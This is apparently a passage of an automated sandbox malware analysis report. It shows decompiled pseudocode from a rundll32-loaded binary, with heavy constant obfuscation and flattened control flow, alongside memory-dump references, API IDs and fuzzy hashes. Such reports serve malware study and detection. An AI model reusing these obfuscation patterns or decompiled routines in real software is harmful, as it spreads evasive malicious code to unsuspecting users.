                                                                                                                      						_push(0x2b10cc);
                                                                                                                      						_t180 = E002BAB66(_v552, _v548, _t220);
                                                                                                                      						_t190 =  *0x2d520c; // 0x0
                                                                                                                      						_t192 =  *0x2d520c; // 0x0
                                                                                                                      						E002BE7CE(_t180, _t220, _v556, _t192 + 8, _t190 + 0x220, _v536, _v584, _v576, _v540, _t190 + 0x220);
                                                                                                                      						_t177 = E002BAE03(_v544, _v592, _v568, _t180);
                                                                                                                      						_t213 =  &(_t213[0xd]);
                                                                                                                      						_t183 = 0xb7324ef;
                                                                                                                      					}
                                                                                                                      					_t183 = 0xb9bc25f;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t183 - 0x6d02df3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t177;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xti$f$jz4$NDh$i""
                                                                                                                      • API String ID: 0-1033842094
                                                                                                                      • Opcode ID: 7c0c66b86cf6f08afdf16087ea495697f67d68cbd601a34ba3b3ed5b1ebf59d0
                                                                                                                      • Instruction ID: e79280dfb70b6d335483bc56b61ad2feaad5f5f184d5959eaf1ea7657e529789
                                                                                                                      • Opcode Fuzzy Hash: 7c0c66b86cf6f08afdf16087ea495697f67d68cbd601a34ba3b3ed5b1ebf59d0
                                                                                                                      • Instruction Fuzzy Hash: 0A8130710183419FC398CF64DA8A55FFBE1BBC4798F109A1DF19696260D3B48A19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002CD3C8(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v96;
                                                                                                                      				char _v616;
                                                                                                                      				void* _t202;
                                                                                                                      				void* _t203;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int _t211;
                                                                                                                      				signed int _t212;
                                                                                                                      				intOrPtr _t226;
                                                                                                                      
                                                                                                                      				_v88 = _v88 & 0x00000000;
                                                                                                                      				_v96 = 0x9df3e3;
                                                                                                                      				_v92 = 0x111c87;
                                                                                                                      				_v84 = 0xa084f0;
                                                                                                                      				_v84 = _v84 | 0x40312458;
                                                                                                                      				_v84 = _v84 ^ 0x40bb7f3e;
                                                                                                                      				_v16 = 0xcefd9d;
                                                                                                                      				_v16 = _v16 + 0xcd96;
                                                                                                                      				_t210 = 0x6a;
                                                                                                                      				_v16 = _v16 * 0xf;
                                                                                                                      				_v16 = _v16 * 0x19;
                                                                                                                      				_v16 = _v16 ^ 0x30695f7a;
                                                                                                                      				_v40 = 0x424711;
                                                                                                                      				_v40 = _v40 + 0x2590;
                                                                                                                      				_v40 = _v40 ^ 0x3a2a5382;
                                                                                                                      				_v40 = _v40 | 0x2443fe5b;
                                                                                                                      				_v40 = _v40 ^ 0x3e6f608b;
                                                                                                                      				_v72 = 0x627874;
                                                                                                                      				_v72 = _v72 >> 0xf;
                                                                                                                      				_v72 = _v72 ^ 0x0000543e;
                                                                                                                      				_v32 = 0xe24590;
                                                                                                                      				_v32 = _v32 | 0xeb3a48f8;
                                                                                                                      				_v32 = _v32 << 7;
                                                                                                                      				_v32 = _v32 * 0x3c;
                                                                                                                      				_v32 = _v32 ^ 0x5522ca4e;
                                                                                                                      				_v48 = 0xd6f907;
                                                                                                                      				_v48 = _v48 << 1;
                                                                                                                      				_v48 = _v48 / _t210;
                                                                                                                      				_v48 = _v48 ^ 0x000b1c59;
                                                                                                                      				_v8 = 0xcfad9d;
                                                                                                                      				_v8 = _v8 << 0xa;
                                                                                                                      				_v8 = _v8 << 6;
                                                                                                                      				_v8 = _v8 + 0xffff7e6c;
                                                                                                                      				_v8 = _v8 ^ 0xad990d89;
                                                                                                                      				_v80 = 0x5a76f4;
                                                                                                                      				_v80 = _v80 << 1;
                                                                                                                      				_v80 = _v80 ^ 0x00be33e4;
                                                                                                                      				_v24 = 0x133aa1;
                                                                                                                      				_v24 = _v24 ^ 0xc65a4b7f;
                                                                                                                      				_v24 = _v24 * 0x1e;
                                                                                                                      				_v24 = _v24 * 0x13;
                                                                                                                      				_v24 = _v24 ^ 0x7f83be07;
                                                                                                                      				_v64 = 0x82e5fc;
                                                                                                                      				_v64 = _v64 + 0xffffc657;
                                                                                                                      				_v64 = _v64 ^ 0x008deef7;
                                                                                                                      				_v52 = 0x864f04;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_v52 = _v52 + 0xeb96;
                                                                                                                      				_v52 = _v52 ^ 0xc9ef9c56;
                                                                                                                      				_v20 = 0x197ff2;
                                                                                                                      				_v20 = _v20 + 0xffff42c2;
                                                                                                                      				_v20 = _v20 + 0x3e6b;
                                                                                                                      				_v20 = _v20 ^ 0xe022d7dd;
                                                                                                                      				_v20 = _v20 ^ 0xe031a9ca;
                                                                                                                      				_v68 = 0x51f027;
                                                                                                                      				_v68 = _v68 ^ 0xb9085631;
                                                                                                                      				_v68 = _v68 ^ 0xb9589630;
                                                                                                                      				_v56 = 0x8df2a2;
                                                                                                                      				_v56 = _v56 ^ 0x4cb2f0be;
                                                                                                                      				_v56 = _v56 ^ 0x0e08f962;
                                                                                                                      				_v56 = _v56 ^ 0x42319e50;
                                                                                                                      				_v12 = 0x46739a;
                                                                                                                      				_v12 = _v12 + 0x8337;
                                                                                                                      				_v12 = _v12 + 0xd158;
                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                      				_v12 = _v12 ^ 0xf903dec7;
                                                                                                                      				_v36 = 0x3dfdbe;
                                                                                                                      				_v36 = _v36 * 0x2f;
                                                                                                                      				_t211 = 0x2a;
                                                                                                                      				_v36 = _v36 / _t211;
                                                                                                                      				_t212 = 0x45;
                                                                                                                      				_v36 = _v36 / _t212;
                                                                                                                      				_v36 = _v36 ^ 0x000da6e6;
                                                                                                                      				_v28 = 0x24761f;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 + 0xffffc268;
                                                                                                                      				_v28 = _v28 >> 8;
                                                                                                                      				_v28 = _v28 ^ 0x0040fbfa;
                                                                                                                      				_v60 = 0xc6a3a8;
                                                                                                                      				_v60 = _v60 + 0xffff6723;
                                                                                                                      				_v60 = _v60 * 0x24;
                                                                                                                      				_v60 = _v60 ^ 0x1bd7278b;
                                                                                                                      				_v44 = 0xb19a36;
                                                                                                                      				_v44 = _v44 + 0xb2d2;
                                                                                                                      				_v44 = _v44 | 0xf7fdfee7;
                                                                                                                      				_v44 = _v44 ^ 0xf7fbe5a1;
                                                                                                                      				_v76 = 0x3b8058;
                                                                                                                      				_v76 = _v76 | 0x902cc23a;
                                                                                                                      				_v76 = _v76 ^ 0x903f9f8c;
                                                                                                                      				_t226 =  *0x2d520c; // 0x0
                                                                                                                      				_t202 = E002C4FA8(_v84, _t226 + 0x220, _v16, _v40);
                                                                                                                      				_t234 = _a4 + 0x2c;
                                                                                                                      				_t203 = E002CFC96(_v72, _v32, _a4 + 0x2c, _v48, _t202);
                                                                                                                      				_t243 = _t203;
                                                                                                                      				if(_t203 != 0) {
                                                                                                                      					_push(_v64);
                                                                                                                      					_push(_v24);
                                                                                                                      					_push(0x2b10cc);
                                                                                                                      					E002BE7CE(E002BAB66(_v8, _v80, _t243), _t243, _v52,  *((intOrPtr*)(_a8 + 0x14)), _v8, _v20, _v68, _v56, _v12, _t234);
                                                                                                                      					E002BAE03(_v36, _v28, _v60, _t206);
                                                                                                                      					E002BBAB0( &_v616, _v44, _v76);
                                                                                                                      				}
                                                                                                                      				return 1;
                                                                                                                      			}


































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: >T$X$1@$k>$txb$z_i0
                                                                                                                      • API String ID: 1586166983-1035483976
                                                                                                                      • Opcode ID: 72b8b4868ff15dfebf17e7b49a73a5c0275ce71b4565eb3a3bb5fbc625ac99b1
                                                                                                                      • Instruction ID: 11d818ef680a54ebea1f5d3b40daf620718a88f824da36f45500a8e0049c61c3
                                                                                                                      • Opcode Fuzzy Hash: 72b8b4868ff15dfebf17e7b49a73a5c0275ce71b4565eb3a3bb5fbc625ac99b1
                                                                                                                      • Instruction Fuzzy Hash: 8C910FB2C00219ABCF18CFE5D98A8DEFBB1FF48304F208159E416B6260D7B45A55CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C542E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				void* _t103;
                                                                                                                      				void* _t104;
                                                                                                                      				void* _t107;
                                                                                                                      				signed int _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t120;
                                                                                                                      				signed int* _t122;
                                                                                                                      
                                                                                                                      				_t122 =  &_v40;
                                                                                                                      				_v16 = 0x36dfa5;
                                                                                                                      				_v16 = _v16 + 0x3b08;
                                                                                                                      				_t107 = __ecx;
                                                                                                                      				_t119 = 0;
                                                                                                                      				_t109 = 0x6b;
                                                                                                                      				_v16 = _v16 / _t109;
                                                                                                                      				_v16 = _v16 ^ 0x0008b2f0;
                                                                                                                      				_t120 = 0x25318c3;
                                                                                                                      				_v32 = 0xe406cb;
                                                                                                                      				_v32 = _v32 + 0xf1ff;
                                                                                                                      				_v32 = _v32 << 0xd;
                                                                                                                      				_t110 = 0x38;
                                                                                                                      				_v32 = _v32 / _t110;
                                                                                                                      				_v32 = _v32 ^ 0x02d3dd20;
                                                                                                                      				_v36 = 0x75fef9;
                                                                                                                      				_v36 = _v36 >> 0xe;
                                                                                                                      				_v36 = _v36 + 0x1d86;
                                                                                                                      				_v36 = _v36 | 0xca94675a;
                                                                                                                      				_v36 = _v36 ^ 0xca99002d;
                                                                                                                      				_v20 = 0xf78cd;
                                                                                                                      				_v20 = _v20 * 0x50;
                                                                                                                      				_v20 = _v20 >> 4;
                                                                                                                      				_v20 = _v20 ^ 0x004e8f0d;
                                                                                                                      				_v24 = 0x451f1c;
                                                                                                                      				_v24 = _v24 + 0xffffecca;
                                                                                                                      				_v24 = _v24 + 0xffffe02c;
                                                                                                                      				_v24 = _v24 ^ 0x0044bfd9;
                                                                                                                      				_v40 = 0xfdbfec;
                                                                                                                      				_v40 = _v40 << 8;
                                                                                                                      				_v40 = _v40 + 0x2a17;
                                                                                                                      				_v40 = _v40 ^ 0x2ee485ab;
                                                                                                                      				_v40 = _v40 ^ 0xd32b8602;
                                                                                                                      				_v28 = 0xc36f29;
                                                                                                                      				_v28 = _v28 >> 0xa;
                                                                                                                      				_v28 = _v28 + 0xffff93a5;
                                                                                                                      				_v28 = _v28 ^ 0xfffd5496;
                                                                                                                      				_v4 = 0xb22cca;
                                                                                                                      				_v4 = _v4 * 0x61;
                                                                                                                      				_v4 = _v4 ^ 0x438b1823;
                                                                                                                      				_v8 = 0x4d4bc7;
                                                                                                                      				_v8 = _v8 + 0xffff7d22;
                                                                                                                      				_v8 = _v8 ^ 0x00436970;
                                                                                                                      				_v12 = 0xfbac3c;
                                                                                                                      				_v12 = _v12 | 0x3e605f41;
                                                                                                                      				_v12 = _v12 << 4;
                                                                                                                      				_v12 = _v12 ^ 0xefb5eaa0;
                                                                                                                      				do {
                                                                                                                      					while(_t120 != 0x25318c3) {
                                                                                                                      						if(_t120 == 0x409e50d) {
                                                                                                                      							_t103 = E002C274F();
                                                                                                                      							_t122 = _t122 - 0xc + 0xc;
                                                                                                                      							_t120 = 0x7f367f8;
                                                                                                                      							_t119 = _t119 + _t103;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t120 == 0x7f367f8) {
                                                                                                                      								_t104 = E002BB782(_t107 + 0xc, _v24, _v40, _v28);
                                                                                                                      								_t122 =  &(_t122[2]);
                                                                                                                      								_t120 = 0xdeee07a;
                                                                                                                      								_t119 = _t119 + _t104;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t120 != 0xdeee07a) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_t119 = _t119 + E002BB782(_t107 + 4, _v4, _v8, _v12);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t119;
                                                                                                                      					}
                                                                                                                      					_t120 = 0x409e50d;
                                                                                                                      					L10:
                                                                                                                      				} while (_t120 != 0xb6d7b22);
                                                                                                                      				goto L6;
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: 74ac0fb4f1715f6c5f29c9132280eacd224c550cd477c88ce57b1df09f00d384
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: B4418AB29093029FC344CF25D98990FFBE1BBD4748F409A2DF49996210D7B4DA1A8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002B1F9B(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                      				char _v32;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				char* _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				intOrPtr _v80;
                                                                                                                      				char _v84;
                                                                                                                      				intOrPtr _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				intOrPtr _t419;
                                                                                                                      				void* _t424;
                                                                                                                      				void* _t432;
                                                                                                                      				signed int _t435;
                                                                                                                      				void* _t444;
                                                                                                                      				intOrPtr* _t446;
                                                                                                                      				void* _t448;
                                                                                                                      				signed char* _t458;
                                                                                                                      				signed char* _t493;
                                                                                                                      				intOrPtr* _t498;
                                                                                                                      				intOrPtr _t499;
                                                                                                                      				intOrPtr _t500;
                                                                                                                      				void* _t501;
                                                                                                                      				signed char* _t502;
                                                                                                                      				signed int _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				intOrPtr _t513;
                                                                                                                      				void* _t514;
                                                                                                                      				void* _t515;
                                                                                                                      				void* _t519;
                                                                                                                      
                                                                                                                      				_t498 = _a20;
                                                                                                                      				_t446 = __edx;
                                                                                                                      				_push(_t498);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v88 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(__ecx);
                                                                                                                      				_v236 = 0xf0db43;
                                                                                                                      				_t515 = _t514 + 0x1c;
                                                                                                                      				_v236 = _v236 + 0xffff6527;
                                                                                                                      				_v236 = _v236 ^ 0x37601acd;
                                                                                                                      				_t499 = 0;
                                                                                                                      				_v236 = _v236 >> 1;
                                                                                                                      				_t448 = 0xb503f3;
                                                                                                                      				_v236 = _v236 ^ 0x1bc82d53;
                                                                                                                      				_v140 = 0x2172ad;
                                                                                                                      				_v140 = _v140 + 0x5f16;
                                                                                                                      				_v140 = _v140 ^ 0x0021d183;
                                                                                                                      				_v124 = 0x27fcb3;
                                                                                                                      				_t504 = 0x21;
                                                                                                                      				_v124 = _v124 / _t504;
                                                                                                                      				_v124 = _v124 ^ 0x00013673;
                                                                                                                      				_v108 = 0x51f448;
                                                                                                                      				_t505 = 0x49;
                                                                                                                      				_v92 = 0;
                                                                                                                      				_v108 = _v108 * 0x2f;
                                                                                                                      				_v108 = _v108 ^ 0x0f088890;
                                                                                                                      				_v212 = 0xcc9eac;
                                                                                                                      				_v212 = _v212 + 0xffffe9a6;
                                                                                                                      				_v212 = _v212 / _t505;
                                                                                                                      				_v212 = _v212 + 0xffffa822;
                                                                                                                      				_v212 = _v212 ^ 0x000711be;
                                                                                                                      				_v220 = 0xbaa1b0;
                                                                                                                      				_t506 = 0x3a;
                                                                                                                      				_v220 = _v220 * 0x1b;
                                                                                                                      				_v220 = _v220 * 0x49;
                                                                                                                      				_v220 = _v220 << 0xd;
                                                                                                                      				_v220 = _v220 ^ 0x5bc66ad4;
                                                                                                                      				_v96 = 0x96051c;
                                                                                                                      				_v96 = _v96 * 0x64;
                                                                                                                      				_v96 = _v96 ^ 0x3a9f1857;
                                                                                                                      				_v144 = 0x7390a9;
                                                                                                                      				_v144 = _v144 + 0xe6fa;
                                                                                                                      				_v144 = _v144 ^ 0x007f1cdd;
                                                                                                                      				_v196 = 0xf57225;
                                                                                                                      				_v196 = _v196 >> 0xe;
                                                                                                                      				_v196 = _v196 + 0xffff98f0;
                                                                                                                      				_v196 = _v196 ^ 0x2c45e12b;
                                                                                                                      				_v196 = _v196 ^ 0xd3b3c009;
                                                                                                                      				_v204 = 0xadefc1;
                                                                                                                      				_v204 = _v204 >> 4;
                                                                                                                      				_v204 = _v204 | 0xb7bea7b8;
                                                                                                                      				_v204 = _v204 / _t506;
                                                                                                                      				_v204 = _v204 ^ 0x03274dc6;
                                                                                                                      				_v224 = 0x9d9cb1;
                                                                                                                      				_v224 = _v224 + 0xffffa27a;
                                                                                                                      				_v224 = _v224 + 0xffffee01;
                                                                                                                      				_v224 = _v224 + 0xffff764e;
                                                                                                                      				_v224 = _v224 ^ 0x0095b081;
                                                                                                                      				_v192 = 0x5eb987;
                                                                                                                      				_v192 = _v192 + 0xffff1159;
                                                                                                                      				_t507 = 0xe;
                                                                                                                      				_v192 = _v192 * 0x23;
                                                                                                                      				_v192 = _v192 + 0xffff653a;
                                                                                                                      				_v192 = _v192 ^ 0x0cdf46f4;
                                                                                                                      				_v104 = 0x141020;
                                                                                                                      				_v104 = _v104 << 6;
                                                                                                                      				_v104 = _v104 ^ 0x0502b476;
                                                                                                                      				_v168 = 0xc57d6d;
                                                                                                                      				_v168 = _v168 / _t507;
                                                                                                                      				_v168 = _v168 | 0x88578591;
                                                                                                                      				_v168 = _v168 ^ 0x8850307a;
                                                                                                                      				_v120 = 0x64bf72;
                                                                                                                      				_v120 = _v120 << 0xf;
                                                                                                                      				_v120 = _v120 ^ 0x5fbc8f9f;
                                                                                                                      				_v128 = 0xd63e1a;
                                                                                                                      				_v128 = _v128 + 0xffff0b7c;
                                                                                                                      				_v128 = _v128 ^ 0x00df6f35;
                                                                                                                      				_v136 = 0xd9491f;
                                                                                                                      				_v136 = _v136 + 0xffff8a09;
                                                                                                                      				_v136 = _v136 ^ 0x00d088a2;
                                                                                                                      				_v112 = 0xceb298;
                                                                                                                      				_v112 = _v112 + 0x36cc;
                                                                                                                      				_v112 = _v112 ^ 0x00c43f46;
                                                                                                                      				_v132 = 0x9f966b;
                                                                                                                      				_v132 = _v132 + 0xd61c;
                                                                                                                      				_v132 = _v132 ^ 0x00a3d2ff;
                                                                                                                      				_v216 = 0x70daad;
                                                                                                                      				_v216 = _v216 ^ 0xde964b68;
                                                                                                                      				_t508 = 0x3f;
                                                                                                                      				_v216 = _v216 * 0x49;
                                                                                                                      				_v216 = _v216 | 0xd3ab0205;
                                                                                                                      				_v216 = _v216 ^ 0xdfb04ca5;
                                                                                                                      				_v200 = 0xe4f811;
                                                                                                                      				_v200 = _v200 + 0xffffdd8f;
                                                                                                                      				_v200 = _v200 | 0x8a8b7b9c;
                                                                                                                      				_v200 = _v200 + 0xb2a2;
                                                                                                                      				_v200 = _v200 ^ 0x8af46931;
                                                                                                                      				_v244 = 0x65145a;
                                                                                                                      				_v244 = _v244 >> 4;
                                                                                                                      				_v244 = _v244 + 0x823b;
                                                                                                                      				_v244 = _v244 / _t508;
                                                                                                                      				_v244 = _v244 ^ 0x000ba257;
                                                                                                                      				_v184 = 0x53b52d;
                                                                                                                      				_v184 = _v184 >> 0xd;
                                                                                                                      				_v184 = _v184 | 0x3ab2fca7;
                                                                                                                      				_v184 = _v184 >> 0xa;
                                                                                                                      				_v184 = _v184 ^ 0x00013efe;
                                                                                                                      				_v176 = 0x3e1c9c;
                                                                                                                      				_v176 = _v176 * 0x3f;
                                                                                                                      				_v176 = _v176 * 0x61;
                                                                                                                      				_v176 = _v176 ^ 0xcaa54878;
                                                                                                                      				_v172 = 0xb8475b;
                                                                                                                      				_v172 = _v172 >> 2;
                                                                                                                      				_v172 = _v172 + 0xffff45a9;
                                                                                                                      				_v172 = _v172 ^ 0x002df2ce;
                                                                                                                      				_v148 = 0x11eadc;
                                                                                                                      				_v148 = _v148 * 0x2c;
                                                                                                                      				_v148 = _v148 ^ 0x0312b4e7;
                                                                                                                      				_v228 = 0xd45ea;
                                                                                                                      				_v228 = _v228 + 0x1c9a;
                                                                                                                      				_v228 = _v228 ^ 0x843ee8f1;
                                                                                                                      				_v228 = _v228 + 0xffff47b4;
                                                                                                                      				_v228 = _v228 ^ 0x843da11a;
                                                                                                                      				_v116 = 0x7a0457;
                                                                                                                      				_t509 = 0x4d;
                                                                                                                      				_v116 = _v116 / _t509;
                                                                                                                      				_v116 = _v116 ^ 0x00002c66;
                                                                                                                      				_v232 = 0x7f0d8a;
                                                                                                                      				_v232 = _v232 + 0xa3a9;
                                                                                                                      				_v232 = _v232 + 0xf9ff;
                                                                                                                      				_v232 = _v232 >> 1;
                                                                                                                      				_v232 = _v232 ^ 0x0040e313;
                                                                                                                      				_v208 = 0x135f21;
                                                                                                                      				_v208 = _v208 | 0x41f85818;
                                                                                                                      				_t510 = 0x60;
                                                                                                                      				_v208 = _v208 * 0x65;
                                                                                                                      				_v208 = _v208 << 0xe;
                                                                                                                      				_v208 = _v208 ^ 0x245ebba3;
                                                                                                                      				_v240 = 0x80e1e4;
                                                                                                                      				_v240 = _v240 + 0x9e19;
                                                                                                                      				_v240 = _v240 * 0x1d;
                                                                                                                      				_v240 = _v240 + 0xa9b2;
                                                                                                                      				_v240 = _v240 ^ 0x0eacf51a;
                                                                                                                      				_v100 = 0x156d59;
                                                                                                                      				_v100 = _v100 + 0x8f40;
                                                                                                                      				_v100 = _v100 ^ 0x001bd2c0;
                                                                                                                      				_v152 = 0x95953b;
                                                                                                                      				_v152 = _v152 >> 7;
                                                                                                                      				_v152 = _v152 / _t510;
                                                                                                                      				_v152 = _v152 ^ 0x000ebfd6;
                                                                                                                      				_v180 = 0x897e25;
                                                                                                                      				_v180 = _v180 | 0x70565201;
                                                                                                                      				_t511 = 0x75;
                                                                                                                      				_v180 = _v180 / _t511;
                                                                                                                      				_v180 = _v180 << 0xd;
                                                                                                                      				_v180 = _v180 ^ 0xdf07d45f;
                                                                                                                      				_v160 = 0x7982fe;
                                                                                                                      				_t512 = 0x32;
                                                                                                                      				_t513 = _v88;
                                                                                                                      				_v160 = _v160 / _t512;
                                                                                                                      				_v160 = _v160 << 0xd;
                                                                                                                      				_v160 = _v160 ^ 0x4dcbb71a;
                                                                                                                      				_v188 = 0x3ea9a3;
                                                                                                                      				_v188 = _v188 >> 2;
                                                                                                                      				_v188 = _v188 * 0x4a;
                                                                                                                      				_v188 = _v188 * 0x27;
                                                                                                                      				_v188 = _v188 ^ 0xb0903fbe;
                                                                                                                      				_v164 = 0x944a5b;
